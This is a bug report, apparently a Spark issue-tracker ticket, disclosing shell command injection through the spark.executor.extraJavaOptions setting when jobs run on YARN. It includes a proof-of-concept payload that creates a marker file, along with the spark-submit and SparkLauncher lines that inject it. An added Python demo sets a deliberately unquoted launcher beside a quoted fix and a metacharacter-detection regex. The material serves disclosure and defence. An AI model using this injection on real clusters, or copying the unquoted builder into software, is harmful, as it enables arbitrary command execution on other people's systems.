
Command Execution Vulnerability in Spark (JavaOptions)

Details

    • Type: Bug
    • Status: Open
    • Priority: Critical
    • Resolution: Unresolved
    • Affects Version/s: 3.5.1
    • Fix Version/s: None
    • Component/s: Spark Submit
    • Labels: None

    Description

      We found that Spark allows a user who submits a JAR to also supply `spark.executor.extraJavaOptions`.

      When the JAR is launched in YARN mode, the value of this option is placed into the executor launch command, and that command is run through `bash -c`. Shell metacharacters in the option value are therefore interpreted, so setting the advanced optional parameter

      spark.executor.extraJavaOptions:

      `touch$IFS/tmp/zzz123`

      injects `touch /tmp/zzz123` into the `bash -c` command that starts the executor. (`$IFS` expands to whitespace, so the shell splits `touch$IFS/tmp/zzz123` into the two words `touch` and `/tmp/zzz123`; backticks make the shell run it as a command substitution before the JVM is even started.)

      Command as:

      spark-submit --class JavaWordCount --master yarn --deploy-mode client --conf spark.executor.extraJavaOptions="\`touch\$IFS/tmp/zzz123\`" test.jar

      For Java (SparkLauncher):

      sparkLauncher.setConf("spark.executor.extraJavaOptions", "`touch$IFS/tmp/zzz123`");

      Spark execution location:

      /yarn/src/main/scala/org/apache/spark/deploy/yarn/ExecutorRunnable.scala
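      The following is an added, self-contained illustration of the injection mechanism described above and of the two checks a practitioner would want; it is not code from Spark or from the reporter. It uses a hypothetical launcher that, like the report's description of the YARN executor command, joins the option tokens into one string and hands it to a shell, with `true` standing in for the JVM binary and a temp file standing in for /tmp/zzz123. The hardened builder shell-quotes each token with `shlex.quote`, and `rejects_shell_metachars` is a constructed pre-submit guard for a gateway that forwards user-supplied `extraJavaOptions`.

```python
import os
import re
import shlex
import subprocess
import tempfile

# Hypothetical stand-in for the executor launch binary (the real launcher
# starts a JVM); "true" ignores its arguments so the demo runs anywhere.
LAUNCHER = "true"


def build_vulnerable(java_opts: str) -> str:
    # Options are whitespace-split and re-joined with no quoting, so shell
    # syntax in the value (backticks, $(...), |) stays live when the string
    # is later handed to "sh -c".
    return LAUNCHER + " " + " ".join(java_opts.split())


def build_hardened(java_opts: str) -> str:
    # Same split, but every token is single-quoted before joining, so the
    # shell passes each token to the launched process as a literal argument.
    return LAUNCHER + " " + " ".join(shlex.quote(t) for t in java_opts.split())


def marker_written(builder, payload_template: str = "`touch$IFS{marker}`") -> bool:
    # Runs the built command line under /bin/sh and reports whether the
    # injected "touch" created the marker file. The marker lives in a fresh
    # temp dir instead of /tmp/zzz123 so the demo leaves nothing behind.
    tmp = tempfile.mkdtemp()
    marker = os.path.join(tmp, "zzz123")
    cmdline = builder(payload_template.format(marker=marker))
    subprocess.run(["/bin/sh", "-c", cmdline], check=False)
    return os.path.exists(marker)


# Constructed guard: JVM flags never need these characters, so a gateway that
# forwards user-supplied spark.*.extraJavaOptions can refuse values containing them.
SHELL_META = re.compile(r"[`;|&<>]|\$\(|\$\{|\$IFS")


def rejects_shell_metachars(conf_value: str) -> bool:
    return SHELL_META.search(conf_value) is not None


if __name__ == "__main__":
    print("vulnerable launcher writes marker:", marker_written(build_vulnerable))
    print("hardened launcher writes marker:  ", marker_written(build_hardened))
    print("guard flags payload:    ", rejects_shell_metachars("`touch$IFS/tmp/zzz123`"))
    print("guard flags normal opts:", rejects_shell_metachars("-XX:+UseG1GC -Xmx2g"))
```

      Running it shows the marker file appearing only with the unquoted builder: `$IFS` expands to whitespace, so `touch$IFS/path` word-splits into `touch /path` inside the backticks and runs before `true` does. The quoted form reaches the launched process as the single literal argument '`touch$IFS/path`' and nothing is executed. Quoting each token at the point where the command line is assembled is the fix that does not depend on filtering; the regex guard is only a defence-in-depth check for a submission front end.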

          People

            Assignee: Unassigned
            Reporter: mistletoe Xiaotong